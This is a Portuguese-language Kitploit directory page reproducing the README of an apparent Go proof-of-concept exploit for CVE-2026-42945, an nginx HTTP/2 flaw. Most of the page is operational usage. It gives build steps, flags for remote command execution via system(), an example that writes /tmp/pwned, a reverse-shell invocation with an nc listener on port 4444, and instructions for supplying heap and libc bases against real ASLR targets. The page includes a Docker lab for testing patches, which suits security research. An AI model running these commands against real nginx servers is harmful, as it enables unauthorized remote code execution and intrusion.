Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42945 — Ferramenta de PoC baseada em Go para CVE-2026-42945 (nginx HTTP/2) com capacidades de detecção, sondagem de crash, execução de comandos e shell reverso em ambientes autorizados. | Kitploit
Ferramentas/GitHubGitHub/redcrazyghost/cve-2026-42945
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebFuzzingTestes de PenetraçãoExploração de Binários
GitHubredcrazyghost/cve-2026-42945

CVE-2026-42945

Ferramenta de PoC baseada em Go para CVE-2026-42945 (nginx HTTP/2) com capacidades de detecção, sondagem de crash, execução de comandos e shell reverso em ambientes autorizados.

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-42945 PoC (Go)

Português | English

Ferramenta auxiliar de deteção e exploração para a implementação nginx HTTP/2 (CVE-2026-42945), utilizada para verificar a presença da vulnerabilidade em ambientes autorizados, comparar a eficácia de correções e reproduzir o comportamento do PoC em ambientes experimentais controlados.

Versões afetadas (estimativa): nginx 0.6.27 – 1.30.0; 1.30.1+ / 1.31.0+ estão corrigidas.


⚠️ Aviso de isenção de responsabilidade (leia atentamente)

Este repositório é exclusivamente para pesquisa de segurança, verificação de vulnerabilidades e testes defensivos.

  1. Autorização legal: Utilize esta ferramenta apenas em sistemas sobre os quais tenha autorização explícita por escrito ou que sejam totalmente seus. A digitalização, deteção ou ataque não autorizados a redes/servidores de terceiros é ilegal; os autores e contribuidores não assumem qualquer responsabilidade legal.
  2. Por sua conta e risco: O processo de exploração pode causar falhas no worker do serviço alvo, interrupção de negócios ou corrupção de dados. Avalie o impacto por si mesmo e realize testes preliminares em ambiente isolado.
  3. Sem garantias: Esta ferramenta é fornecida "como está", sem garantia de sucesso em qualquer ambiente de produção real; resultados de canal lateral não equivalem a RCE confirmada – a verificação independente (por exemplo, escrita de ficheiro, eco de comando, reverse shell) é obrigatória.
  4. Proibição de uso indevido: É proibido utilizar esta ferramenta para penetração em sistemas não autorizados, extorsão, destruição, mineração ou qualquer finalidade ilegal. Ao fazer o download, compilar ou utilizar, declara que leu e concorda com este aviso.
  5. Sem relação com a NGINX oficial: Este projeto é uma implementação de investigação independente e não representa a posição da NGINX oficial ou de qualquer fabricante.

Caso não aceite os termos acima, pare de usar imediatamente e elimine este repositório.


Resumo de funcionalidades


Requisitos de ambiente

  • Go ≥ 1.26 (ver go.mod)
  • Opcional: Docker + docker compose (ambiente experimental local)
  • Opcional: make, golangci-lint (desenvolvimento/verificação de código)
  • Verificação de exploração: o alvo deve expor os endpoints necessários para o PoC (ex.: GET /api/, POST /spray); as imagens Docker experimentais já os incluem

Limitações e ambiente de aplicação


Compilação

root@kitploit:~
# Compilação rápida (saída em bin/, ignorado pelo .gitignore)
make build-cmd

# Ou diretamente com go
go build -o ./bin/cve-2026-42945 ./cmd

# Ver versão embutida
./bin/cve-2026-42945 -version

Binários de release: Descarregue cve-2026-42945-<os>-<arch> para a sua plataforma em Releases (construído automaticamente pelo GitHub Actions ao fazer push da tag v*).


Guia de utilização

Parâmetros da linha de comandos

root@kitploit:~
-target string      Alvo IP/hostname (padrão 127.0.0.1)
-port int           Porta alvo (0=80; versão vulnerável Docker usa frequentemente 19321)
-docker             Testar ambiente experimental Docker local (vuln:19321, fixed:19331)
-check-only         Apenas deteção, sem enviar tráfego de exploit
-probe-crash        Sonda de overflow + canal lateral de falha do worker
-cmd string         Comando a executar via system()
-shell              Reverse shell (requer -lhost)
-lhost string       IP da máquina local para reverse shell
-lport int          Porta local para reverse shell (padrão 4444)
-docker-profile     Usar perfis de deploy/docker para bases heap/libc reais
-heap-base string   Endereço base da heap (hexadecimal, ex.: 0x555555659000)
-libc-base string   Endereço base da libc (hexadecimal)
-tries int          Número de tentativas por candidato de heap (padrão 10)
-timeout int        Timeout HTTP por pedido em segundos (padrão 5)
-v                  Saída detalhada
-version            Mostrar versão e sair

O modo -docker não pode ser combinado com -cmd / -shell; para exploração de um único alvo, especifique -port 19321.

1. Apenas deteção do alvo

root@kitploit:~
./bin/cve-2026-42945 -target 192.168.1.10 -port 80 -check-only

2. Canal lateral de falha (alvo único)

root@kitploit:~
./bin/cve-2026-42945 -port 19321 -probe-crash -v

3. Comparação com ambiente experimental Docker

Primeiro, inicie os contentores experimentais:

root@kitploit:~
make docker-up
# ou
docker compose -f deploy/docker-compose.yml up -d --build

A primeira compilação requer a compilação do nginx, podendo demorar alguns minutos; aguarde até que os serviços estejam healthy (docker compose ps) antes de executar make test-lab.

ServiçoPortaDescrição
vuln19321nginx 1.30.0 (vulnerável)
fixed19331nginx 1.30.1 (corrigido)

Deteção em lote:

root@kitploit:~
./bin/cve-2026-42945 -docker -check-only
./bin/cve-2026-42945 -docker -probe-crash

Ou utilize atalhos do Makefile:

root@kitploit:~
make test-lab          # check + probe
make cmd-exploit       # Escreve /tmp/pwned no vuln e mostra comando de verificação

4. Executar comando no Docker vuln (validação RCE)

No contentor experimental com ASLR desativado (setarch -R) e perfis pré-definidos (-docker-profile), a taxa de sucesso é máxima:

root@kitploit:~
./bin/cve-2026-42945 -port 19321 -docker-profile \
  -cmd 'echo pwned > /tmp/pwned' -v

# Verificar se o ficheiro foi escrito
docker exec nginx-rift-vuln-1.30.0 cat /tmp/pwned

5. Reverse shell

root@kitploit:~
# Terminal 1: Iniciar ferramenta (tentará escuta nc em segundo plano)
./bin/cve-2026-42945 -port 19321 -docker-profile -shell -lhost 10.0.0.5 -lport 4444 -v

# Se não encontrar nc, abra outro terminal para escuta manual:
nc -lvnp 4444

6. Layout de memória personalizado

Em alvos reais com ASLR e versões de libc diferentes do Docker, é necessário divulgar ou estimar as bases:

root@kitploit:~
# O alvo deve estar numa porta HTTP (sem TLS)
./bin/cve-2026-42945 -target TARGET -port 8080 \
  -heap-base 0x555555659000 \
  -libc-base 0x7ffff77ba000 \
  -cmd 'id' -tries 20 -v

Interpretação de resultados

  • [+] Canal lateral: worker anómalo: Indica apenas que o worker pode ter falhado devido a overflow; não deve ser considerado prova isolada de RCE.
  • Verificação secundária obrigatória: Verifique efeitos colaterais do comando (ficheiros, processos, docker exec, etc.).
  • Causas comuns de falha: ASLR ativado, offsets heap/libc incorretos, endpoint PoC indisponível, WAF/rate limiting, contentor precisa de restart.

Estrutura do projeto

root@kitploit:~
cmd/                 Ponto de entrada principal
internal/rift/       Lógica de deteção, construção de payload e exploração
deploy/docker/       Imagens experimentais nginx 1.30.0 / 1.30.1
deploy/docker-compose.yml
.github/workflows/   Construção de releases multi-plataforma

Desenvolvimento

root@kitploit:~
make help            # Ver todos os alvos make
make test            # Testes unitários
make lint            # golangci-lint
make version         # Mostrar versão atual da compilação

Publicar nova versão:

root@kitploit:~
git tag v1.0.0
git push origin v1.0.0

Referências

  • Repositório: https://github.com/RedCrazyGhost/CVE-2026-42945
  • CVE: CVE-2026-42945 (vulnerabilidade relacionada ao HTTP/2 do nginx; consulte o comunicado oficial)
  • Licença: Licença MIT
  • Segurança: SECURITY.md

Lembrete final

Utilize esta ferramenta apenas em sistemas que tenha o direito de testar. Qualquer uso indevido não é da responsabilidade dos autores.

Baixar ferramenta
ModoDescrição
-check-onlyVerificação de conectividade, cabeçalho Server, estimativa de versão, deteção de endpoint PoC
-probe-crashEnvia uma sonda de overflow e avalia através de canal lateral (falha do worker)
-cmdConstrói payload de exploit, executa comando especificado via system()
-shellReverse shell (requer -lhost; a máquina local precisa de nc)
-dockerTeste em lote do ambiente experimental Docker local (vuln / fixed)
ItemDescrição
ProtocoloSuporta apenas HTTP em texto claro (net.Dial + bytes HTTP brutos), não suporta HTTPS/TLS. Para portas TLS como -port 443, é necessário terminação TLS prévia ou usar porta HTTP.
Experiência DockerImagens são linux/amd64; o primeiro docker compose build compila o nginx a partir do código-fonte, demorando bastante; dentro do contentor, setarch -R desativa ASLR, diferindo muito do ambiente de produção.
Apple SiliconO Docker local executa via platform: linux/amd64 (emulação), mais lento.
Reverse shell-shell depende do nc do sistema; no Windows, recomenda-se escuta manual.
Confirmação de exploraçãoCanal lateral (falha do worker) não equivale a RCE; é obrigatória verificação independente de efeitos colaterais do comando.